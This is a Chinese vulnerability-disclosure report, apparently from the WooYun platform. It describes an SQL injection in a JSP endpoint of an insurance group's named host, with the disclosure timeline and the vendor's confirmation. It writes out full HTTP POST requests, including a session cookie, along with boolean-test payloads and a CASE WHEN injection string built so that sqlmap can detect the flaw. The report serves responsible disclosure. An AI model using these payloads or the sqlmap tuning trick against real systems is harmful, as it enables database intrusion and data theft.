漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:泛华保险服务集团某处注入影响25个数据库含注射语句构造技巧
漏洞作者: 枪花
提交时间:2015-08-16 16:39
修复时间:2015-10-04 19:28
公开时间:2015-10-04 19:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-08-16: 细节已通知厂商并且等待厂商处理中 2015-08-20: 厂商已经确认,细节仅向厂商公开 2015-08-30: 细节向核心白帽子及相关领域专家公开 2015-09-09: 细节向普通白帽子公开 2015-09-19: 细节向实习白帽子公开 2015-10-04: 细节向公众公开
简要描述: 泛华保险服务集团某处注入影响25个数据库含注射语句构造技巧
详细说明:
POST /common/cvar/CExec.jsp HTTP/1.1 Content-Length: 150 Content-Type: application/x-www-form-urlencoded Referer: http://scan.cninsure.net Cookie: JSESSIONID=0000rnQkP4raiw-pMQgbrmCELKt:14jbakc78 Host: scan.cninsure.net Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* mOperate=&startIndex=&txtCodeCondition=&txtCodeName=&txtConditionField=1'&txtFrameName=&txtOther=&txtQueryResult=&txtShowWidth=&txtSQL=&txtVarData=
加' 报错 返回500 说明数据库出错了 然后构造测试语句' or '1'='1不出错 返回大量数据 ' or '1'='2 不返回数据 确定存在注入,但是丢入SQLMAP 却无法识别 然后为了使SQLMAP顺利识别 这么构造注射语句 ' or 1=(case when 1=1 then 1 else 2 end) and '1'='1 最终数据包改为:
POST /common/cvar/CExec.jsp HTTP/1.1 Content-Length: 150 Content-Type: application/x-www-form-urlencoded Referer: http://scan.cninsure.net Cookie: JSESSIONID=0000rnQkP4raiw-pMQgbrmCELKt:14jbakc78 Host: scan.cninsure.net Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* mOperate=&startIndex=&txtCodeCondition=&txtCodeName=' or 1=(case when 1=1* then 1 else 2 end) and '1'='1&txtConditionField=&txtFrameName=&txtOther=&txtQueryResult=&txtShowWidth=&txtSQL=&txtVarData=
成功注射
漏洞证明: 得到当前user:
存在25个数据库 注射出前两个 时间关系 不继续深入 仅证明问题的存在
修复方案: 版权声明:转载请注明来源 枪花 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2015-08-20 19:26
厂商回复: 部分模块未及时更新,目前已在处理
最新状态: 暂无
漏洞评价:
评论